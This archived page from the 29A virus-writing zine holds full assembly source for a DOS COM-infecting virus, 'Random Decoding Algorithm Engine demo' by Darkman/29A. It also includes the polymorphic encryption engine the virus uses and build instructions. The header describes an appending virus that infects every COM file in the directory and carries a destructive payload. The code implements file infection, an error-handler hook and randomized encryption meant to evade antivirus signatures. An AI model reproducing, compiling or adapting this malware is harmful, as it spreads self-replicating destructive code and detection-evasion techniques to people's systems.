Copy Link
Add to Bookmark
Report
29A Issue 03 03 12
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[rdaedemo.asm]ÄÄ
comment *
Random Decoding Algorithm Engine demo
Code by
Darkman/29A
Random Decoding Algorithm Engine demo is a 866 bytes direct action appending
COM virus, infects every file in current diretory. Random Decoding Algorithm
Engine demo has an error handler and is using the Random Decoding Algorithm
Engine v 1.00 [RDAE]. Random Decoding Algorithm demo has a destructive
payload.
Compile Random Decoding Algorithm E... with Turbo Assembler v 5.0 by typing:
TASM /M RDAEDEMO.ASM
TLINK /x RDAEDEMO.OBJ
EXE2BIN RDAEDEMO.EXE RDAEDEMO.COM
*
.model tiny
.code
code_begin:
cld ; Clear direction flag
mov cx,05h ; CX = length of encrypted code
lea si,[bp+origin_code] ; SI = offset of origin_code
push si ; Save SI at stack
call_imm16 equ word ptr $+01h ; Offset of CALL imm16
call first_gen
restore_code:
pop si ; Load SI from stack
mov di,100h ; DI = offset of beginning of code
push di ; Save DI at stack
movsw ; Move the original code to beginning
movsw ; " " " " " "
movsb ; " " " " " "
mov ax,3524h ; Get interrupt vector 24h
int 21h
push bx es ; Save registers at stack
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
mov ah,25h ; Set interrupt vector 24h
lea dx,[bp+int24_virus] ; DX = offset of int24_virus
int 21h
push ax ; Save AX at stack
mov ah,1ah ; Set Disk Transfer Area address
lea dx,[bp+dta] ; DX = offset of dta
int 21h
mov ah,4eh ; Find first matching file (DTA)
mov cl,00100110b ; CL = file attribute mask
sub dx,(dta-file_specifi)
find_next:
int 21h
jnc infect_file ; No error? Jump to infect_file
virus_exit:
mov ah,1ah ; Set disk transfer area address
mov dx,80h ; DX = offset of default DTA
int 21h
pop ax ; Load AX from stack
pop es bx ; Load registers from stack
int 21h
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
xor ax,ax ; Zero AX
mov bx,ax ; " BX
mov cx,ax ; " CX
cwd ; " DX
mov di,ax ; " DI
mov si,ax ; " SI
mov bp,ax ; " BP
ret ; Return
infect_file:
mov ax,3d02h ; Open file (read/write)
lea dx,[bp+filename] ; DX = offset of filename
int 21h
xchg ax,bx ; BX = file handle
jc close_file ; Error? Jump to close_file
mov ah,3fh ; Read from file
mov cx,05h ; Read five bytes
sub dx,(filename-origin_code)
int 21h
mov si,dx ; SI = offset of origin_code
mov ax,[si] ; AX = two bytes of origin_code
cmp al,10111101b ; MOV BP,imm16 (opcode 0bdh)?
je close_file ; Already infected? Jump to close_...
xor ax,'MZ' ; EXE signature?
jz close_file ; Zero? Jump to close_file
xor ax,('ZM' xor 'MZ') ; EXE signature?
jz close_file ; Zero? Jump to close_file
mov ax,4202h ; Set current file position (EOF)
cwd ; Zero DX
mov cx,dx ; " CX
int 21h
cmp ax,(code_end-code_begin)*02h
jb close_file ; Below? Jump to close_file
cmp ax,0fefeh-(data_end-code_begin)
jbe get_sys_time ; Below or equal? Jump to get_sys_...
close_file:
mov ah,3eh ; Close file
int 21h
mov ah,4fh ; Find next matching file (DTA)
jmp find_next
get_sys_time:
add ax,100h ; Add offset of beginning of code ...
mov [bp+virus_offset],ax
mov ah,2ch ; Get system time
int 21h
mov al,00000001b ; AL = flags
cmp ch,04h ; 4.00am?
jne write_file ; Below? Jump to write_file
inc ax ; AL = flags
cmp cl,28h ; 4.40am?
jb write_file ; Above? Jump to write_file
inc ax ; AL = flags
write_file:
push bx ; Save BX at stack
mov cx,05h ; CX = length of original code
call rdae_encrypt
pop bx ; Load BX from stack
mov ah,40h ; Write to file
mov cx,(code_end-code_begin)
mov dx,bp ; DX = delta offset
int 21h
cmp ax,cx ; Written all of the virus?
jne close_file_ ; Not equal? Jump to close_file_
mov ax,4200h ; Set current file position (SOF)
cwd ; Zero DX
mov cx,dx ; " CX
int 21h
mov ah,40h ; Write to file
mov cl,05h ; Write five bytes
lea dx,[bp+infect_code] ; DX = offset of infect_code
int 21h
close_file_:
mov ax,5701h ; Set file's data and time
mov cx,[bp+file_time] ; CX = file's time
mov dx,[bp+file_date] ; DX = file's date
int 21h
jmp close_file
int24_virus proc near ; Interrupt 24h of Random Decoding...
mov al,03h ; Fail system call in progress
iret ; Interrupt return
endp
infect_code:
virus_offset equ word ptr $+01h ; Offset of virus within infected ...
mov bp,00h ; BP = delta offset
jmp bp
include rdae.asm ; Include Random Decoding Algorith...
file_specifi db '*.COM',00h ; File specification
origin_code db 11001101b,00100000b,?,?,?,?
db '[Random Decoding Algorithm Engine demo] '
db '[Darkman/29A]' ; Author of the virus
code_end:
dta:
db 15h dup(?) ; Used by DOS for find next-process
file_attr db ? ; File attribute
file_time dw ? ; File time
file_date dw ? ; File date
filesize dd ? ; Filesize
filename db 0dh dup(?) ; Filename
include rdae.inc ; Include Random Decoding Algorith...
data_end:
first_gen:
pop bx ax ; Load registers from stack
std ; Set direction flag
mov cx,(code_end-code_begin)
lea di,code_end+105h-01h
lea si,code_end+105h-06h
rep movsb ; Move virus to delta offset
cld ; Clear direction flag
lea ax,[origin_code+105h]
lea bx,[restore_code+105h]
mov bp,105h ; BP = delta offset
mov [call_imm16+105h],(rdae_decrypt-restore_code)
push ax bx ; Save registers at stack
ret ; Return
end code_begin
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[rdaedemo.asm]ÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[rdae.asm]ÄÄ
comment *
Random Decoding Algorithm Engine v 1.00 [RDAE] ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Code by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Calling parameters:
AL Flags (only when calling rdae_encrypt)
CX Length of original/encrypted code
BP Delta offset
DS:SI Pointer to original/encrypted code
Flags:
xxxxxx00 Low security, high speed, 256 different algorithms.
xxxxxx01 Medium security, medium speed, 65.536 different algorithms.
xxxxxx10 High security, low speed, 16.777.216 different algorithms.
xxxxxx11 Highest security, lowest speed, 4.294.967.296 different algorithms.
Encryption/decryption algorithms:
NOP; SEGCS; NEG AL; NOT AL; DEC AL; INC AL; ROL AL,01h; ROR AL,01h
ADD AL,CL; ROL AL,CL; ROR AL,CL; SUB AL,CL; XOR AL,CL; ADD AL,imm8
SUB AL,imm8; XOR AL,imm8
Encryption/decryption keys:
Eighty-one, random, 8-bit, with the possibility of being a sliding key.
Checksum:
32-bit Cyclic Redundancy Check (CRC-32), of the decryption algoritm.
Levels of security:
Four.
Random Decoding Algorithm Engine v 1.00 [RDAE] length: 567 bytes.
*
rdae_begin:
rdae_encrypt proc near ; Random Decoding Algorithm Engine...
push cx si ; Save registers at stack
push ax ; Save AX at stack
call prepare_rdae
mov cl,(key_end-key_begin)
lea di,[bp+key_table] ; DI = offset of key_table
gen_key_loop:
push cx ; Save CX at stack
gen_key_loo:
call get_rnd_num
mov cl,(key_end-key_begin)
lea bx,[bp+key_table] ; BX = offset of key_table
cmp_key_loop:
cmp [bx],al ; Current encryption/decryption k...?
je gen_key_loo ; Equal? Jump to key_tab_loo
inc bx ; Increase index register
loop cmp_key_loop
pop cx ; Load CX from stack
stosb ; Store 8-bit random number
loop gen_key_loop
pop cx ; Load CX from stack (AX)
and cx,0000000000000011b
inc cx ; CX = number of encryption/decryp...
mov dx,cx ; DX = " " "
lea di,[bp+decrypt_algo]
gen_dec_loop:
mov al,(algori_end_-algori_begin)/04h
call rnd_in_range
shl bl,01h ; Multiply 8-bit random number wit...
shl bl,01h ; " " " " "
lea si,[bx+algori_table]
add si,bp ; Add delta offset to offset withi...
movsw ; Move decryption algorithm
mov al,(key_end-key_begin)
call rnd_in_range
add bx,bp ; Add delta offset to random numbe...
mov al,[bx+key_table] ; AL = encryption/decryption key
push ax si ; Save registers at stack
call exam_sto_key
loop gen_dec_loop
lea di,[bp+encrypt_algo]
gen_enc_loop:
pop si ax ; Load registers from stack
movsw ; Move encryption algorithm
call exam_sto_key
dec dx ; Decrease count register
jnz gen_enc_loop ; Not zero? Jump to gen_dec_loop
pop si bx ; Load registers from stack
std ; Set direction flag
add si,bx ; Add length of original code to p...
dec si ; SI = offset of last byte of plai...
mov di,si ; DI = " " " " " "
encrypt_loop:
inc cx ; Increase count register
lodsb ; AL = byte of original code
encryp_begin:
encrypt_algo db 08h dup (?) ; Encryption algorithm
encryp_end:
stosb ; Store byte of encrypted code
cmp cx,bx ; Encrypted all bytes of original...?
jne encrypt_loop ; Not equal? Jump to encrypt_loop
call calc_crc32
cld ; Clear direction flag
lea di,[bp+crc32] ; DI = offset of crc32
stosw ; Store low-order word of CRC-32 c...
xchg ax,dx ; DX = high-order word of CRC-32 c...
stosw ; Store high-order word of CRC-32 ...
jmp rdae_exit
endp
rdae_decrypt proc near ; Random Decoding Algorithm Engine...
push cx si ; Load registers from stack
call prepare_rdae
gen_dec_loo:
mov cl,(decryp_end-decryp_begin)/02h
lea di,[bp+decrypt_algo]
lea si,[bp+decrypt_ptr] ; SI = offset of decrypt_ptr
push si ; Save SI at stack
gen_dec_loo_:
lodsw ; AX = offset within key_table
push si ; Save SI at stack
xchg ax,si ; AX = offset within key_table
lodsb ; AL = encryption/decryption key
xchg ax,bx ; BL = " "
pop si ; Load SI from stack
lodsw ; AX = offset within algori_table
push si ; Save SI at stack
xchg ax,si ; AX = offset within algori_table
movsw ; Move decryption algorithm to dec...
xchg ax,bx ; AL = encryption/decryption key
call exam_sto_key
pop si ; Load SI from stack
loop gen_dec_loo_
pop di ; Load DI from stack (SI)
inc_idx_loop:
mov si,di ; SI = offset within decrypt_idx
lodsw ; AX = offset within key_table
xchg ax,bx ; BX = " " "
lodsw ; AX = offset within algori_table
lea si,[bp+algori_end] ; SI = offset of algori_end
cmp ax,si ; Encryption/decryption algorithm...?
jb dont_inc_key ; Below? Jump to dont_inc_key
inc bx ; Increase decryption key index po...
lea si,[bp+key_end] ; SI = offset of key_end
cmp bx,si ; End of table of encryption/decr...?
jne sto_idx_ptrs ; Not equal? Jump to sto_idx_ptrs
lea bx,[bp+key_table] ; AX = offset of key_table
dont_inc_key:
add ax,04h ; Add four to offset within algori...
lea si,[bp+algori_end_] ; SI = offset of algori_end_
cmp ax,si ; End of table of encryption/decr...?
jne sto_idx_ptrs ; Equal? Jump to sto_idx_ptrs
lea ax,[bp+algori_table]
sto_idx_ptrs:
xchg ax,bx ; AX = offset within key_table
stosw ; Store offset within key_table
xchg ax,bx ; AX = offset within algori_table
stosw ; Store offset within algori_table
lea si,[bp+algori_table]
cmp ax,si ; Beginning of table of encryptio...?
je inc_idx_loop ; Equal? Jump to inc_idx_loop
call calc_crc32
cmp ax,word ptr [bp+crc32]
jne gen_dec_loo ; Not equal? Jump to gen_dec_loo
cmp dx,word ptr [bp+crc32+02h]
jne gen_dec_loo ; Not equal? Jump to gen_dec_loo
pop si cx ; Load registers from stack
mov di,si ; DI = offset of encrypted code
decrypt_loop:
lodsb ; AL = byte of encrypted code
decryp_begin:
decrypt_algo db 08h dup (?) ; Decryption algorithm
decryp_end:
stosb ; Store byte of decrypted code
loop decrypt_loop
rdae_exit:
call wipeout_info
ret ; Return
endp
prepare_rdae proc near ; Prepare Random Decoding Algorith...
lea di,[bp+crc32_table] ; DI = offset of crc32_table
xor bx,bx ; Zero BX
gen_crc_tbl_:
xor ax,ax ; Zero AX
cwd ; " DX
mov al,bl ; AL = count register
mov cx,08h ; Rotate CRC-32 through carry atle...
calc_crc_tbl:
shr dx,01h ; Shift logical right highh-order ...
rcr ax,01h ; Rotate low-order word of CRC-32 ...
jnc dont_xor_crc ; No carry? Jump to dont_xor_crc
xor ax,8320h ; AX = low-order word of CRC-32 in...
xor dx,0edb8h ; DX = high-order word of CRC-32 i...
dont_xor_crc:
loop calc_crc_tbl
stosw ; Store low-order word of CRC-32 i...
xchg ax,dx ; AX = high-order word of CRC-32 i...
stosw ; Store high-order word of CRC-32 ...
xchg ax,dx ; AX = low-order word of CRC-32 in...
inc bl ; Increase count register
jnz gen_crc_tbl_ ; Not zero? Jump to gen_crc_tbl_
wipeout_info proc near ; Wipeout information
mov al,10010000b ; NOP (opcode 90h)
mov cl,08h ; Store eight NOPs
lea di,[bp+encrypt_algo]
rep stosb ; Store NOPs
mov cl,08h ; Store eight NOPs
add di,(decrypt_algo-encryp_end)
rep stosb ; Store NOPs
lea ax,[bp+key_table] ; BX = offset of key_table
lea bx,[bp+algori_table]
mov cl,04h ; Store four decryption algorithm ...
lea di,[bp+decrypt_ptr] ; DI = offset of decrypt_ptr
sto_idx_loop:
stosw ; Store offset of key_table
xchg ax,bx ; AX = offset of algori_table
stosw ; Store offset of algori_table
xchg ax,bx ; AX = offset of key_table
loop sto_idx_loop
ret ; Return!
endp
endp
calc_crc32 proc near ; Calculate CRC-32 checksum
mov cx,(decryp_end-decryp_begin)
lea si,[bp+decrypt_algo]
mov ax,-01h ; AX = low-order word of CRC-32 ch...
mov dx,ax ; DX = high-order word of CRC-32 c...
crc32_loop:
xor bx,bx ; Zero BX
mov bl,[si] ; BL = low-order byte of index reg...
inc si ; Increase index register
xor bl,al ; BL = low-order byte of index reg...
shl bx,01h ; Multiply index register by four
shl bx,01h ; " " " " "
mov al,ah ; AL = low-order byte of low-order...
mov ah,dl ; AH = high-order byte of low-orde...
mov dl,dh ; DL = low-order byte of low-order...
xor dh,dh ; Zero DH
add bx,bp ; Add delta offset to offset withi...
xor ax,word ptr [bx+crc32_table]
xor dx,word ptr [bx+crc32_table+02h]
loop crc32_loop
not dx ; AX = low-order word of CRC-32 ch...
not ax ; DX = high-order word of CRC-32 c...
ret ; Return!
endp
; Modified version of the Random Number Generator (RNG) used in the Rickety
; and Hardly Insidious yet New Chaos Engine v 2.00 [RHINCE] by
; Rhincewind/VLAD.
get_rnd_num proc near ; Get 8-bit random number
in al,40h ; AL = 8-bit random number
adc [bp+random_num],al ; Add current 8-bit random number ...
random_num equ byte ptr $+01h ; 8-bit random number
mov ax,00h ; AX = 8-bit random number
ret ; Return!
endp
rnd_in_range proc near ; Get random number within range
xchg ax,bx ; BL = number within range
call get_rnd_num
div bl ; AH = random number within range
mov bl,ah ; BL = " " " "
xor bh,bh ; Zero BH
ret ; Return!
endp
exam_sto_key proc near ; Examine, store encryption/decryp...
lea bx,[bp+algori_end] ; BX = offset of algori_end
cmp si,bx ; Encryption/decryption algorithm...?
jbe dont_sto_key ; Below or equal? Jump to dont_sto...
dec di ; DI = offset of encryption/decryp...
stosb ; Store encryption/decryption key
dont_sto_key:
ret ; Return!
endp
db ' [RDAE] ' ; Name of the engine
algori_table:
algori_begin:
nop ; Decryption algorithm
nop ; Decryption "
nop ; Encryption "
nop ; Encryption "
segcs ; Decryption "
segcs ; Decryption "
segcs ; Encryption "
segcs ; Encryption "
not al ; Decryption "
not al ; Encryption "
neg al ; Decryption "
neg al ; Encryption "
inc al ; Decryption "
dec al ; Encryption "
dec al ; Decryption "
inc al ; Encryption "
ror al,01h ; Decryption "
rol al,01h ; Encryption "
rol al,01h ; Decryption "
ror al,01h ; Encryption "
xor al,cl ; Decryption "
xor al,cl ; Encryption "
sub al,cl ; Decryption "
add al,cl ; Encryption "
ror al,cl ; Decryption "
rol al,cl ; Encryption "
rol al,cl ; Decryption "
ror al,cl ; Encryption "
add al,cl ; Decryption "
sub al,cl ; Encryption "
algori_end:
xor al,00h ; Encryption "
xor al,00h ; Decryption "
sub al,00h ; Encryption "
add al,00h ; Decryption "
add al,00h ; Encryption "
sub al,00h ; Decryption "
algori_end_:
crc32 dd ? ; CRC-32 of the decryption algorithm
key_begin:
key_table db 51h dup(?) ; Table of encryption/decryption keys
key_end:
rdae_end:
rdae_length equ (rdae_end-rdae_begin)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[rdae.asm]ÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[rdae.inc]ÄÄ
crc32_table db 400h dup(?) ; CRC-32 initial table
decrypt_ptr dw 08h dup(?) ; Decryption algorithm and key poi...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[rdae.inc]ÄÄ
